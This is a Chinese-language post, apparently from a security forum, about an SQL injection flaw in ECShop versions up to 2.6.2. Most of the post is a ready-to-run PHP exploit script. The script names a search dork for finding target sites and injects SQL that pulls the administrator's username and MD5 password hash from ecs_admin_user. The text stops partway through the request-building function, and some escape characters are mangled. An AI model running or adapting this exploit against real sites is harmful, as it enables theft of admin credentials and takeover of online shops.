影响2.5.x和2.6.x,其他版本未测试

goods_script.php

44行:

复制代码代码如下:

if (empty($_GET['type']))

{

...

}

elseif ($_GET['type'] == 'collection')

{

...

}

$sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);

$res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)

EXP:

复制代码代码如下:

#!/usr/bin/php

<?php

print_r('

+---------------------------------------------------------------------------+

ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit

by puret_t

mail: puretot at gmail dot com

team: http://bbs.wolvez.org

dork: "Powered by ECShop"

+---------------------------------------------------------------------------+

');

/**

* works with register_globals = On

*/

if ($argc < 3) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to ecshop

Example:

php '.$argv[0].' localhost /ecshop/

+---------------------------------------------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$resp = send();

preg_match('#href="([S]+):([a-z0-9]{32})"#', $resp, $hash);

if ($hash)

exit("Expoilt Success!nadmin:t$hash[1]nPassword(md5):t$hash[2]n");

else

exit("Exploit Failed!n");

function send()

{

global $host, $path;

$cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';

$data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1rn";

$data .= "Accept: */*rn";

$data .= "Accept-Language: zh-cnrn";

$data .= "Content-Type: application/x-www-form-urlencodedrn";

$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn";

$data .= "Host: $hostrn";

$data .= "Content-Length: ".strlen($cmd)."rn";

$data .= "Connection: Closernrn";

$data .= $cmd;